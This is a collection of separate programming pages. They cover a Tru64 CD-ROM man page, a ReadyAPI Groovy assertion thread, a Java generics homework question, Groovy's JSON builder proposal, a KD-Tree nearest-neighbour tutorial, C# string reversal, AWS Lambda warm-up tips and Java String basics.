You can also use the concat() method with string literals, as in − "My name is ".concat("Zara"); Strings are more commonly concatenated with the + operator, as in − "Hello," + " world" + "!" which results in − "Hello, world!" Let's consider the following example − public class StringDemo { public static void main(String args[]) { String string1 = "saw I was "; System.out.println("Dot " + string1 + "Tod"); } } This will produce the following result − Output Dot saw I was Tod The String class also supports format strings for producing formatted output. Instead of printing directly with − System.out.printf("The value of the float variable is " + "%f, while the value of the integer " + "variable is %d, and the string " + "is %s", floatVar, intVar, stringVar); You can write − String fs; fs = String.format("The value of the float variable is " + "%f, while the value of the integer " + "variable is %d, and the string " + "is %s", floatVar, intVar, stringVar); System.out.println(fs); The difference is that format() returns the formatted text as a String you can reuse, rather than printing it once. Here is the list of methods supported by the String class.
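The concatenation and format() behavior described above can be checked with a short, self-contained program. The class name FormatDemo and the sample values are illustrative additions, not from the tutorial; Locale.US is used so the decimal separator is predictable on any machine:

```java
import java.util.Locale;

public class FormatDemo {
    public static void main(String[] args) {
        float floatVar = 3.5f;
        int intVar = 7;
        String stringVar = "hello";

        // format() returns the formatted text as a String instead of printing it;
        // Locale.US pins the decimal separator so the output is predictable
        String fs = String.format(Locale.US,
                "float=%.1f int=%d string=%s", floatVar, intVar, stringVar);
        System.out.println(fs); // prints: float=3.5 int=7 string=hello

        // Concatenation with + produces a new String
        String greeting = "Hello," + " world" + "!";
        System.out.println(greeting); // prints: Hello, world!
    }
}
```

Because format() hands back a String, the same formatted text can be logged, stored, or printed several times without rebuilding it.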
https://chercher.tech/java-programming/strings
CC-MAIN-2019-18
refinedweb
449
64.2
What is an Array of Strings? A string is a collection of characters, and an array of strings is an array of arrays of characters. Each string is terminated with a null character. An array of strings is one of the most common applications of two-dimensional arrays. scanf( ) is the input function with the %s format specifier to read a string as input from the terminal. But its drawback is that it terminates as soon as it encounters a space. To avoid this, the gets( ) function can be used, which reads a whole line including white spaces. A string is an array of characters terminated with the special character known as the null character ("\0"). Syntax datatype name_of_the_array[size_of_elements_in_array]; char str_name[size]; Example datatype name_of_the_array [ ] = { Elements of array }; char str_name[8] = "Strings"; str_name is the string name and the size defines the length of the string (number of characters). A string can be defined as a one-dimensional array of characters, so an array of strings is a two-dimensional array of characters. Syntax char str_name[size][max]; Syntax char str_arr[2][6] = { {'g','o','u','r','i','\0'}, {'r','a','m','\0'}}; Alternatively, we can even declare it as Syntax char str_arr[2][6] = {"gouri", "ram"}; From the given syntax there are two subscripts: the first one specifies how many strings to declare and the second defines the maximum length of characters that each string can store, including the null character. Since each character takes 1 byte of memory in C, the above example occupies 2 * 6 = 12 bytes of memory. Example char str_name[8] = {'s','t','r','i','n','g','s','\0'}; By the rule of initialization of arrays, the above declaration can be written as char str_name[] = "Strings"; Index: 0 1 2 3 4 5 6 7 Characters: 's' 't' 'r' 'i' 'n' 'g' 's' '\0' Address: 2000 2001 2002 2003 2004 2005 2006 2007 This is a representation of how strings are allocated in memory for the above-declared string in C.
Each character in the string has an index and an address allocated to it. In the above representation, the null character ("\0") is automatically placed by the C compiler at the end of the string when it initializes the above-declared array. Usually, strings are declared using double quotes; as per the rules of string initialization, when the compiler encounters double quotes it automatically appends a null character at the end of the string. From the above example we know that the name of the array points to the 0th index, at address 2000, since the indexing of an array starts from 0. Therefore, str_name + 0 points to the character 's' str_name + 1 points to the character 't' As the above example is a one-dimensional array, the pointer points to each character of the string. Examples of Array String in C #include <stdio.h> int main() { char name[10]; printf("Enter the name: "); fgets(name, sizeof(name), stdin); printf("Name is : "); puts(name); return 0; } Now for two-dimensional arrays, we have the following syntax and memory allocation. For this, we can take it as a row and column representation (table format). char str_name[size][max]; In this table representation, each row (first subscript) defines the number of strings to be stored and each column (second subscript) defines the maximum length of the strings. char str_arr[2][6] = { {'g','o','u','r','i','\0'}, {'r','a','m','\0'}}; Alternatively, we can even declare it as Syntax: char str_arr[2][6] = {"gouri", "ram"}; From the above example we know that the name of the array points to the 0th string. Therefore, str_arr + 0 points to the 0th string "gouri" str_arr + 1 points to the 1st string "ram" As the above example is a two-dimensional array, the pointer points to each string of the array.
#include <stdio.h> int main() { int i; char name[2][8] = { "gouri", "ram" }; for (i = 0; i < 2; i++) { printf("String = %s \n", name + i); } return 0; } Output: Functions of strings strcpy(s1,s2); this function copies string s2 into string s1. char s1[10] = "gouri"; char s2[10] = "ram"; char s3[10]; strcpy(s3,s2); result => strcpy(s3,s2) : ram strcat(s1,s2); this function concatenates strings s1 and s2; string s2 is appended at the end of string s1. char s1[10] = "gouri"; char s2[10] = "ram"; strcat(s1,s2); result => strcat(s1,s2) : gouriram strlen(s1); this function returns the length of the string s1. char s1[10] = "gouri"; strlen(s1); result => 5 strcmp(s1,s2); this function compares the strings s1 and s2. strchr(s1, ch); this function finds the first occurrence of the given character ch in the string s1, and the returned pointer points to this character in the string. strstr(s1,s2); this function finds the first occurrence of string s2 in the string s1, and the returned pointer points to the start of s2 within s1. Some operations are invalid: in str_arr[0] = "gouri"; a new pointer is assigned to the array name, which is a constant pointer, so this is not possible. To avoid this we can assign the string by using strcpy(str_arr[0],"gouri"). Conclusion An array of strings is simply a list of strings. From the above introduction, we can conclude that declaration and initialization of strings differ, as we saw that the compiler appends a null character to every string literal when it reads it. There are many string handling functions; a few functions with examples are explained above. Therefore, arrays of strings are as easy to use as any other arrays.
https://www.educba.com/strings-array-in-c/
CC-MAIN-2020-16
refinedweb
999
56.08
Introduction: ESP32-S2 Saola Making the RGB Work I could not find any example code on how to access the NeoPixel on my new ESP32-S2, so I decided to write some and share it for anyone else who would like to do the same. Step 1: Here Is Some Code to Get Your NeoPixel on Your ESP32-S2 Cycling. First you need the ESP32-S2 devices installed in your Arduino IDE, downloaded here:... You will need the NeoPixel library from Adafruit to get this sketch to work. Finally just run the code attached. // //Sample code to control the single NeoPixel on the ESP32-S2 Saola // #include <Adafruit_NeoPixel.h> // On the ESP32-S2 SAOLA, GPIO 18 is the NeoPixel. #define PIN 18 //Single NeoPixel Adafruit_NeoPixel pixels(1, PIN, NEO_GRB + NEO_KHZ800); #define DELAYVAL 25 // Time (in milliseconds) to pause between color changes void setup() { //This pixel is just way too bright, lower it to 10 so it does not hurt to look at. pixels.setBrightness(10); pixels.begin(); // INITIALIZE NeoPixel (REQUIRED) } // Simple function to return a color in the rainbow // Input a value 0 to 255 to get a color value. uint32_t Wheel(byte WheelPos) { //Assume the wheel value is less than 85; if so, the Green value is 0 uint32_t returnColor = Adafruit_NeoPixel::Color((byte)(255 - (WheelPos * 3)), 0, (byte)(WheelPos * 3)); //Between 85 and 170 the Red value is 0 if (WheelPos > 84 && WheelPos < 170) { WheelPos -= 85; returnColor = Adafruit_NeoPixel::Color(0, (byte)(WheelPos * 3), (byte)(255 - WheelPos * 3)); } //Finally, at 170 and above the Blue value is 0 else if (WheelPos >= 170) { WheelPos -= 170; returnColor = Adafruit_NeoPixel::Color((byte)(WheelPos * 3), (byte)(255 - WheelPos * 3), 0); } return returnColor; } //Counter to run from 0-255 to cycle the colors of the rainbow. int colorCount = 0; void loop() { //Set the new color on the pixel. pixels.setPixelColor(0, Wheel(colorCount++)); // Send the updated pixel colors to the hardware. pixels.show(); //Cycle the colors at the end.
if (colorCount > 255) colorCount = 0; // Pause before next pass through loop delay(DELAYVAL); } Comments 8 months ago on Step 1 After looking all over to find a working example I finally found this. Luckily I had already loaded the ESP32-S2 board in the Arduino IDE, so it was much easier to get this working. Thanks JeffL117! Reply 8 months ago You're welcome, happy to help. 1 year ago Dear Jeff, thanks for your work using the Saola ESP32-S2. I am attempting to upload any sketch to this unit and I'm greeted by a header error. I have selected node32s as a suitable board. I want to use whatever you selected because it obviously works. So, what board should I select, as there is no Saola in the list of esp32 choices? Thank you in advance. Bill Phillips, retired Reply 1 year ago Hey Bill, you need to make sure you have the ESP32-S2 libraries. Make sure that you change the branch from Master to ESP32-S2. Reply 1 year ago Now Sunday, August 16th, 2020: before you reply to my last report to you, I have followed the instructions from GitHub, for Windows, to install the library. It ends prematurely. I then watched a couple of YouTube videos on the topic of installing the -S2, trying to follow English subtitles while the presenters moved their mouse too fast over text too small.. well, I just wished your instructable on the S2 Saola had included the Arduino IDE setup. It seems that Arduino has not completed their official support for the S2. Thank you for listening.. back to the esp8266 for now. Bill Phillips, Surrey, BC, Canada. Reply 11 months ago I agree with those words; I have tried for weeks to make it work with no luck. We need a much better explanation of how to install this so the Arduino IDE can be used. Reply 1 year ago Thank you. I did select the esp32-s2 branch and downloaded the zip file. The IDE reported 'not a valid library'. So I unzipped it and manually copied it to the sketch directory libraries.
This time the complaint was: Invalid library found in C:\Users\TwWork 3\Documents\Arduino\libraries\arduino-esp32-esp32s2: no headers files (.h) found in C:\Users\TwWork 3\Documents\Arduino\libraries\arduino-esp32-esp32s2 I noticed too that the library contained a tools folder containing .exe's. Not sure what to do now. Regards, Bill Phillips 1 year ago on Step 1 Hi, Thank you for the project. I have tested this on my ESP32-S2 dev board and it works fine; however, if I try to use the setPixelColor function after initialising a WiFi connection, the LED does not show the correct color or intensity. The following example shows the LED in red, green, blue and white and then does a WiFi connect. It then attempts to do the same color display, but it goes wrong. Apparently something to do with the following:... The suggestion is to use the FastLED library (but I have not been able to get that to work). #include <Adafruit_NeoPixel.h> #include <WiFi.h> #include <WiFiMulti.h> // On the ESP32-S2 SAOLA, GPIO 18 is the NeoPixel. #define PIN 18 Adafruit_NeoPixel pixels(1, PIN, NEO_GRB + NEO_KHZ800); //Single NeoPixel WiFiMulti WiFiMulti; // Simple function to set a color based on RGB values void ShowColor(int r, int g, int b) { pixels.setPixelColor(0, r, g, b); //Set the new color on the pixel. pixels.show(); // Send the updated pixel colors to the hardware. delay(1000); // Pause before next pass through loop } void setup() { Serial.begin(115200); delay(10); Serial.println("Setting brightness"); pixels.setBrightness(10); pixels.begin(); // INITIALIZE NeoPixel (REQUIRED) ShowColor(0, 0, 0); ShowColor(255, 0, 0); ShowColor(0, 255, 0); ShowColor(0, 0, 255); ShowColor(255, 255, 255); pixels.clear(); pixels.show(); // We start by connecting to a WiFi network WiFiMulti.addAP("SSID", "password"); Serial.println(); Serial.println(); Serial.print("Waiting for WiFi...
"); while (WiFiMulti.run() != WL_CONNECTED) { Serial.print("."); delay(500); } Serial.println(""); Serial.println("WiFi connected"); Serial.print("IP address: "); Serial.println(WiFi.localIP()); ShowColor(255,0,0); ShowColor(0,255,0); ShowColor(0,0,255); ShowColor(255,255,255); ShowColor(0,0,0); } void loop() { } Any help appreciated.
https://www.instructables.com/ESP32-S2-Saola-Making-the-RGB-Work/
CC-MAIN-2021-39
refinedweb
1,042
65.42
Adding the connections: So now it was time to go ahead and start making the connections of the line follower. I restacked the shield again on top of the Arduino. Afterwards, I connected the left motor to the shield where it says M1. I used two jumper cables to connect the ends of the wires from the servo to the shield, since the servo's end wires weren't going to be able to connect through the holes of M1. I did the same thing with the right motor, but connected it where it says M3, as shown in the picture below. When making these connections, don't insert any of the wires into the port where it says GND. Just use the two ports directly underneath the labels of the motors. I didn't know which of the two wires would go to which port, since the motors may spin in the opposite direction once they are powered, but I would not know until everything was powered on and working. The blue wires from the sensor I connected on top of the shield at the analog pins, from analog pin 0 to analog pin 4. The leftmost sensor goes into analog pin 0. The sensor next to the leftmost goes into analog pin 1. The middle sensor goes into analog pin 2, and so forth for the remaining two sensor wires. The power wire of the sensor board I connected directly to the regulated 5V pin on the Arduino. The green wire was connected to one of the ground pins next to the regulated 5V pin. Now, to power this robot, I decided to use two separate power sources for the Arduino and for the motor shield, since I've read online that sharing a power source can sometimes create problems. For the Arduino, I used a 9V battery connected through the barrel jack that came with it. For the motor shield, I got my hands on a battery case that I borrowed from my school. The case holds 6 AA batteries, which provide a final 9V to the motor shield. From reading online, you cannot use a regular 9V battery such as the one I am using for the Arduino. The recommended voltage for the motor shield is 5 to 12 volts, so 9 volts is okay.
I connected the battery case to the shield where it reads power. In the picture below, all my connections are done, except that I have not completed the battery connections for the Arduino or the motor shield. I placed the Arduino on top of the sensor board. I decided to put electrical tape underneath the Arduino as a precaution, to avoid any short circuiting of the sensor board and of the Arduino. The battery pack for the motor shield was placed towards the back of the frame as shown. The 9V battery for the Arduino was placed to the side as shown. With the case closed: The Programming: For the programming of the Arduino, I first got a code that was already prewritten for a line follower using this setup. The link to the code is: But this code was written for an older version of the shield than the one I am using. So I had to make just a few changes to make the code work. But first I had to download the library for the motor shield, which was found on the website where I ordered the shield from, Adafruit.com. Once the library is downloaded, it is important to copy it to the Arduino's libraries folder. So that's what I did. After copying the library, I made the changes to the code from the link above. The code is: // Linus the Line-bot // Follows a black line on a white surface (poster board and electrical tape, or the floor and tape). // Code by JDW 2010 - feel free to modify.
// Modified by Gerardo Ramos March 11, 2014 // My first arduino project, first electronic project #include <Wire.h> // this includes the Afmotor library for the motor-controller #include <Adafruit_MotorShield.h> #include "utility/Adafruit_PWMServoDriver.h" Adafruit_MotorShield AFMS = Adafruit_MotorShield(); Adafruit_DCMotor *motor_left=AFMS.getMotor(1); // attach motor_left to the Adafruit motor shield M1 Adafruit_DCMotor *motor_right=AFMS.getMotor(3); // attach motor_right to the Adafruit motor shield M3 // Create variables for sensor readings int sensor1 = 0; int sensor2 = 0; int sensor3 = 0; int sensor4 = 0; int sensor5 = 0; // Create variables for adjusted readings int adj_1=0; int adj_2=0; int adj_3=0; int adj_4=0; int adj_5=0; // You can change the min/max values below to fine tune each sensor (placeholder calibration values; tune for your sensors) int s1_min=0; int s1_max=1023; int s2_min=0; int s2_max=1023; int s3_min=0; int s3_max=1023; int s4_min=0; int s4_max=1023; int s5_min=0; int s5_max=1023; // Value to define the lower threshold int lower_threshold=80; // Value to define a middle threshold (half of the total 255 value range) int threshold=110; // This threshold defines when the sensor is reading the white poster board or // the floor if you are testing it on the floor like I did. int upper_threshold=200; // This value sets the maximum speed of linus (max=255). // using a speed potentiometer will over-ride this setting.
int speed_value=220; // End of changeable variables void setup() { Serial.begin(9600); // Start serial monitor to see sensor readings AFMS.begin(); // declare left motor motor_left->setSpeed(255); motor_left->run(RELEASE); // declare right motor motor_right->setSpeed(255); motor_right->run(RELEASE); } void update_sensors(){ // This will read sensor 1 sensor1=analogRead(0); adj_1=map(sensor1,s1_min,s1_max,0,255); adj_1=constrain(adj_1,0,255); // This will read sensor 2 sensor2=analogRead(1); // sensor 2 = left-center adj_2=map(sensor2,s2_min,s2_max,0,255); adj_2=constrain(adj_2,0,255); // This will read sensor 3 sensor3=analogRead(2); // sensor 3 = center adj_3=map(sensor3,s3_min,s3_max,0,255); adj_3=constrain(adj_3,0,255); // This will read sensor 4 sensor4=analogRead(3); // sensor 4 = right-center adj_4=map(sensor4,s4_min,s4_max,0,255); adj_4=constrain(adj_4,0,255); // This will read sensor 5 sensor5=analogRead(4); // sensor 5 = right adj_5=map(sensor5,s5_min,s5_max,0,255); adj_5=constrain(adj_5,0,255); } void loop(){ update_sensors(); // update the sensors // First, check the value of the center sensor if (adj_3<lower_threshold){ // If center sensor value is below threshold, check surrounding sensors if (adj_2>threshold && adj_4>threshold){ // If all sensors check out (if statements are satisfied), drive forward motor_left->run(FORWARD); motor_left->setSpeed(speed_value); motor_right->run(FORWARD); motor_right->setSpeed(speed_value); } // You want the line bot to stop when it reaches the black box. else if (adj_1<30){ if (adj_2<30){ if (adj_3<30){ if (adj_4<30){ if (adj_5<30){ // Here all the sensors are reading black, so stop the bot.
motor_left->run(RELEASE); motor_right->run(RELEASE); } } } } } } // Otherwise, the center sensor is above the threshold // So we need to check what sensor is above the black line else { // First check sensor 1 if (adj_1<upper_threshold && adj); } // If not sensor 1 or 5, then check sensor 2 else if (adj_2<upper_threshold && adj_4>upper_threshold){ motor_left->run(RELEASE); motor_left->setSpeed(0); motor_right->run(FORWARD); motor_right-(" "); } // End of this code Once I completed the code, I connected my Arduino to my laptop. Then I reopened the code and compiled it to make sure there were no errors. Then I uploaded the code to the Arduino. At this point I didn't have the motor shield powered, so I could see what the sensors were reading. To do this I opened the serial monitor. Turn off autoscroll so you can see what the sensors are reading. So I placed the line follower on the floor to see what it reads. For me, it read the floor at high readings, around 255, which is good. It means that it's reading the floor as if it were a white poster board. I didn't have a large poster board to test the Arduino, so I opted to just use my floor. For my lower threshold I used 80. The original code had 20, which was good, but sometimes my sensors didn't read low enough to get below 20. So I used 80. Just compare your readings of the black line to your thresholds. You want the reading of the black line to be lower than the lower threshold value. Here I was experimenting with 50, but it didn't really work out well. Sometimes my middle sensor would be directly above the black line but would get a reading sometimes in the 60's, so the if-else statement didn't work well and the line follower wouldn't go in a straight line. Some of the reasons why it's not reading a low enough number may be that the sensors are placed too close together, or that the adjacent sensors are directly perpendicular to the floor, so maybe some of their infrared light is being read by the middle sensor.
Whatever the reason was, I had to increase my lower threshold value. There are times where my readings are as low as 8, but that isn't the case every time. So I increased my lower threshold to 80. And I also increased my threshold value to 110, just to make sure the if-else statements work. I also decreased my upper threshold value to 200 to allow it to account for slightly darker areas of the floor. The speed of the line follower can be chosen from any value from 0 to the maximum of 255. For me, I used 220. Compare your thresholds with the if-else statements to make sure that everything makes sense, and to figure out what numbers you should choose for your setup, since every setup is going to be slightly different. Doing a Test Run: Now, after "calibrating" the line follower, it was time to do a test run. At first I was doing a small track, but the turns were a little too tight. So I did a bigger track. I used black electrical tape for the track. I made sure the tape was flat all around the track to prevent it from being too high and getting in the way of the line follower, as I have learned from doing it a few times. There are times where the line follower does go off track, but I think it's because it is possibly reading debris on the ground. Well, that is the only explanation I can think of. Another issue that I had was that sometimes the turns could be too tight, such as the one at the bottom right of my laptop. I figure that with a smaller frame, the robot could execute the turns much better, as I have seen on YouTube videos of racing line followers. Well, that's it guys, until next time, when I will have video of the line follower in action.
http://bocabearingsworkshop.blogspot.com/2015/04/arduino-robot-project-part-4-shield-and.html
CC-MAIN-2017-51
refinedweb
1,763
69.62
XMLEncoder - StackOverflowError - overriding equals Jonathan Janisch Greenhorn Joined: Mar 17, 2007 Posts: 24 posted Apr 06, 2007 12:42:00 0 Hi, I'm trying to write out a class to XML using XMLEncoder. There are a few unique things about this class. 1) It has no default constructor 2) I'm overriding the equals method. 3) The class has a static int count which defaults to 0. Each object is assigned an ID based on the current count. The ID is used to compare two objects. Since it has no default constructor, I'm using the DefaultPersistenceDelegate. Here's the code: public class Person { private String name; private int id; private static int count = 0; /** * Creates a new instance of Person */ public Person(String name) { this.name = name; this.id = count; count++; System.out.println("Person constructor called. Count = " + count); } public boolean equals(Object obj) { System.out.println("Equals? This: " + this + " Obj: " + obj); if (obj instanceof Person) { System.out.println("Person: " + obj); return id == ((Person)obj).id; } else { return false; } } public int hashCode() { return id; } public String getName() { return name; } public int getId() { return id; } public void setId(int id) { this.id = id; System.out.println("setId called"); } public static void main(String[] args) { Person p1 = new Person("Java Duke"); Person p2 = new Person("John Smith"); Person p3 = new Person("Bob Jones"); java.beans.XMLEncoder enc = new java.beans.XMLEncoder(System.out); enc.setPersistenceDelegate(Person.class, new java.beans.DefaultPersistenceDelegate( new String[]{ "name"})); enc.writeObject(p1); enc.writeObject(p2); enc.writeObject(p3); enc.close(); } } If you run this, you will get a StackOverflowError (at least under JDK 1.6.0_01 on Windows). I'm not an XMLEncoder expert; I've narrowed the problem down and came up with this simple Person.java example. The combination of the static int ID and the overridden equals seems to be the problem.
If you change the equals to: public boolean equals(Object obj) { return super.equals(obj); } It will still give the same error. However, if you remove the equals method completely, it will work fine and the XML output is as I expected. But unfortunately, I need to override the equals method. 1) Does anyone know how I can fix this? 2) Why would "return super.equals(obj)" give different behavior than having no equals method at all? Note: I realize that if my class were really a Person class, the equals method should compare SSN, first and last name, etc., and not some made-up int ID - this is just a simple example to demonstrate the problem. Thank you! Jonathan Janisch Greenhorn Joined: Mar 17, 2007 Posts: 24 posted Apr 06, 2007 13:12:00 0 I solved it by using my own persistence delegate to create a new Person. I don't understand why I had to do this, since I thought that was the purpose of the DefaultPersistenceDelegate. I did see some stuff in the source for DefaultPersistenceDelegate that involved checks for overriding equals - but I won't pretend that I understand how it works. public class PersonPersistenceDelegate extends DefaultPersistenceDelegate { @Override protected Expression instantiate(Object oldInstance, Encoder out) { System.out.println("Instantiate called"); Person old = (Person)oldInstance; return new Expression(oldInstance, oldInstance.getClass(), "new", new Object[] { old.getName() }); } }
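For readers who want to try the fix, here is a trimmed, self-contained sketch in the same spirit as the thread's PersonPersistenceDelegate. It is an illustration of the delegate technique, not an exact reproduction: the Person here uses a name-based equals rather than the thread's static-counter id, and the delegate is an anonymous subclass whose instantiate() builds the constructor Expression explicitly:

```java
import java.beans.DefaultPersistenceDelegate;
import java.beans.Encoder;
import java.beans.Expression;
import java.beans.XMLEncoder;
import java.io.ByteArrayOutputStream;

public class DelegateDemo {
    public static class Person {
        private final String name;
        public Person(String name) { this.name = name; }
        public String getName() { return name; }
        @Override public boolean equals(Object o) {
            return o instanceof Person && ((Person) o).name.equals(name);
        }
        @Override public int hashCode() { return name.hashCode(); }
    }

    public static void main(String[] args) {
        ByteArrayOutputStream buf = new ByteArrayOutputStream();
        XMLEncoder enc = new XMLEncoder(buf);
        // Custom delegate: build "new Person(name)" ourselves instead of
        // letting DefaultPersistenceDelegate infer it from properties
        enc.setPersistenceDelegate(Person.class, new DefaultPersistenceDelegate() {
            @Override protected Expression instantiate(Object old, Encoder out) {
                return new Expression(old, old.getClass(), "new",
                        new Object[]{ ((Person) old).getName() });
            }
        });
        enc.writeObject(new Person("Java Duke"));
        enc.close();
        System.out.println(buf.toString()); // XML with the constructor argument
    }
}
```

The key point matches the thread's conclusion: once instantiate() is supplied directly, the encoder no longer relies on the equals()-driven matching that trips over identity-style equals implementations.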
http://www.coderanch.com/t/382409/java/java/XMLEncoder-Stackoverflowerror-overriding-equals
CC-MAIN-2015-48
refinedweb
587
59.09
On Thu, Sep 9, 2010 at 4:45 PM, Mo, Zhenyao <zhenyao@gmail.com> wrote: > According... This does sound like an unclear area in the OpenGL spec. For example, what happens if you query GL_FRAMEBUFFER_ATTACHMENT_OBJECT_NAME for the color attachment of such a framebuffer? The texture is still referenced by the framebuffer, so it probably hasn't been actually deleted, but the name is no longer accessible in the context's namespace. However, I'm not sure that this is really a security issue. OpenGL implementations are expected not to crash in this situation. If one does, then a given WebGL implementation might need to work around the crash, but I'm not convinced that an explicit mention of this in the spec, and the associated divergence from OpenGL ES 2.0 behavior, is warranted.
https://www.khronos.org/webgl/public-mailing-list/archives/1009/msg00155.php
CC-MAIN-2016-44
refinedweb
133
57.47
Dear Developers, Most of the developers on Apache Cocoon 2 are willing to produce the first beta very soon. I'd like to collect the showstopper issues remaining. A few days ago Carsten proposed the 18th of May as a beta date. No one objected to it, but there are still issues left, and the time I have to work on it at the moment is really sparse. The recent discussion about Parameter forced me to have a look at all the interfaces that belong to sitemap components. I've found that we need to vote on the following topics. a) Does a Matcher need to be parameterized, and thus do we need to expand the match method of the Matcher interface with Parameters? b) The same issue is true for Selector as well. Does it need it, too? The discussion and voting about moving the <parameter> element into the map namespace will block the beta release until it's done, because this is a change of the sitemap syntax/semantics and we cannot do it afterward, as it would break backward compatibility. I know that it will not be a trivial change for whoever patches the sitemap.xsl file, because of some code optimization done there based on namespace tests (see my recent response to Marcus Crafter's question about those tests). Another issue is the production of the dists. I made some tests yesterday evening and found that the result is very large (about 18M). After analysing it I've seen that the source dist has all the jars twice in it: once in the ./lib and once in the ./webapp/WEB-INF/lib directory. How can/should we reduce it? Also, there is no "binary dist" target in the build.xml yet. Well, this might not be an issue for the beta-1 release. A few weeks/months ago we discussed standardizing the namespaces we use in C2.
The general pattern we agreed upon was: Where APPLICATION is either "cocoon" for Cocoon-centric applications or "xsp" for logicsheets, FOOBAR is the name of the application concern, and VERSION is another pattern describing the version of the application in the form major.minor, where both are positive integers. There have been ports of logicsheets from C1 which don't respect this naming convention. Should we change those namespaces to the pattern above, or introduce new ones (with similar or equal functionality) sometime after going beta? Ah, the new I18nTransformer (the old one has this as well, IIRC) uses a parameter named src to specify the dictionary to use. I think it should be consistent with all sitemap components in that such values are best specified in the src attribute of the transform element: <map:transform And also, do we really need two of them? Are they so different from each other as to legitimate this? As I've said at the beginning of this mail, my time is very limited these days, and thus I cannot propose a date for the beta because I cannot predict when the issues listed here will be fixed/realized. The 18th of May is tomorrow, so it will not be Realizable (uh, another Avalon interface? :). We can shift it from week to week, but that doesn't make any fun. For me and most of you this is an unpleasant situation, but it doesn't make any sense to define a date for going beta without seeing it as really possible to make. So, your comments and votes :) Giacomo --------------------------------------------------------------------- To unsubscribe, e-mail: cocoon-dev-unsubscribe@xml.apache.org For additional commands, email: cocoon-dev-help@xml.apache.org
http://mail-archives.apache.org/mod_mbox/cocoon-dev/200105.mbox/%3C990082235.3b0374bbf12d5@mail.otego.com%3E
CC-MAIN-2014-52
refinedweb
601
62.98
Reference to child element Yue_Hong Dec 17, 2013 6:19 AM How can we reference an element which is added dynamically at runtime? Example code: <?xml version="1.0" encoding="utf-8"?> <s:WindowedApplication xmlns:fx="" xmlns:s="library://ns.adobe.com/flex/spark" xmlns: <fx:Script> <![CDATA[ import mx.events.FlexEvent; protected function init(event:FlexEvent):void { trace(button1.label); var newbtn:Button = new Button(); newbtn.label = "New Button"; newbtn.id = "button3"; newbtn.name = "button3"; mygroup.addElement(newbtn); trace(this["button3"].label); } ]]> </fx:Script> <s:HGroup id="mygroup"> <s:Button id="button1"/> <s:Button id="button2"/> </s:HGroup> </s:WindowedApplication> When I try to run the above code, it dispatches the error Error #1069: Property button3 not found on project1 and there is no default value. So, how can I refer to the newly added button? Thank you. 1. Re: Reference to child element Craberoid Dec 17, 2013 7:27 AM (in response to Yue_Hong) Hi! Try getChildByName("button3"); 2. Re: Reference to child element Yue_Hong Dec 17, 2013 7:39 AM (in response to Craberoid) Tried. Not working. 3. Re: Reference to child element pauland Dec 17, 2013 7:46 AM (in response to Yue_Hong) Yue_Hong wrote: Tried. Not working. It wouldn't. "button3" is a child of the group. Try mygroup.getChildByName("button3"); 4. Re: Reference to child element Craberoid Dec 17, 2013 7:57 AM (in response to pauland) Or just use variables to hold references. If it will be an array of dynamic elements, you can use a Dictionary or an associative array (Object), for example.
https://forums.adobe.com/thread/1360227
You can use this module with the following in your ~/.xmonad/xmonad.hs:

import XMonad.Actions.Commands

Then add a keybinding to the runCommand action:

, ((modMask x .|. controlMask, xK_y), runCommand commands)

and define the list of commands you want to use:

commands :: [(String, X ())]
commands = defaultCommands

Whatever key you bound to will now cause a popup menu of internal xmonad commands to appear. You can change the commands by changing the contents of the list commands. (If you like it enough, you may even want to get rid of many of your other key bindings!) For detailed instructions on editing your key bindings, see XMonad.Doc.Extending#Editing_key_bindings.
http://hackage.haskell.org/package/xmonad-contrib-0.6/docs/XMonad-Actions-Commands.html
AN010 Finite State Machines

Finite State Machines (FSM) are a great way to organize your code on embedded devices. The basic concepts are:

- Each step is organized into a state, with defined exit conditions that cause it to transfer to other state(s).
- State handlers should return quickly, rather than blocking.

Our simple example here has four states (you can see them in the enum below). In reality, this example is so simple you could do it linearly, with blocking. That's example 02-Linear, but as your code gets more complicated, a finite state machine can keep it simpler and easier to understand.

While this example only has a single state machine, where they really shine is when you need to handle multiple state machines. For example, something like a web server on a Photon: you really have one state machine that's accepting new connections, and one for each concurrent connection. Doing that linearly would be crazy!

You can download the files associated with this app note as a zip file.

Author: Rick

01-Simple

This is the simplest example of a state machine, which we'll walk through. This is just the standard stuff to set the modes:

#include "Particle.h"

SYSTEM_THREAD(ENABLED);
SYSTEM_MODE(SEMI_AUTOMATIC);

It's best to use the log handler instead of directly writing to the serial port. In addition to adding thread safety and timestamps, it also makes it easy to switch between Serial1 (TX/RX) and Serial (USB). When debugging sleep mode, it's better to use TX and an external TTL serial to USB serial converter (FT232), because the USB serial port disconnects when the device goes to sleep and takes a while to reconnect (especially under Windows). Using an external USB serial converter keeps the USB serial connection up even when the device is in sleep mode. To switch between the two, you just need to comment out one line or the other here:

Serial1LogHandler logHandler(115200);
// SerialLogHandler logHandler;

These are our configurable parameters.
This uses Chrono Literals, which are a great feature of Device OS 1.5.0 and later. Instead of setting 6 minutes in milliseconds (360000, or 6 * 60 * 1000), you can just use 6min. You can also use 30s for seconds, or 2h for hours.

// This is the maximum amount of time to wait for the cloud to be connected in
// milliseconds. This should be at least 5 minutes. If you set this limit shorter,
// on Gen 2 devices the modem may not get power cycled which may help with reconnection.
const std::chrono::milliseconds connectMaxTime = 6min;

// How long to sleep
const std::chrono::seconds sleepTime = 1min;

// Maximum time to wait for publish to complete. It normally takes 20 seconds for Particle.publish
// to succeed or time out, but if cellular needs to reconnect, it could take longer, typically
// 80 seconds. This timeout should be longer than that and is just a safety net in case something
// goes wrong.
const std::chrono::milliseconds publishMaxTime = 3min;

These are the state numbers. In an enum, the values are sequential, so STATE_PUBLISH is 1.

// These are the states in the finite state machine, handled in loop()
enum State {
    STATE_WAIT_CONNECTED = 0,
    STATE_PUBLISH,
    STATE_PUBLISH_WAIT,
    STATE_SLEEP
};

These are two state machine variables. One is the current state, which is one of the enumerated constants above. The other is a generic millis value that we use to time certain operations.

// Global variables
State state = STATE_WAIT_CONNECTED;
unsigned long stateTime;

A few more global variables. We'll talk about publishFuture more below, but it's a technique for using Particle.publish() asynchronously (non-blocking) while still getting the success or failure indication.

// The publishFuture is used to find out when the publish completes, asynchronously
particle::Future<bool> publishFuture;

// A buffer to hold the JSON data we publish.
char publishData[256];

Our setup() function. Since we used SEMI_AUTOMATIC mode, we connect in setup().
Also remember the millis() value when we started up. This will be pretty close to 0.

void setup() {
    Cellular.on();
    Particle.connect();
    stateTime = millis();
}

Our loop() function. This example uses a big switch statement, based on the state number. There are other techniques that you may prefer in the other examples, including:

- if statements instead of switch
- switch, but with a separate function for each state
- Using function pointers instead of state numbers
- Using a separate class

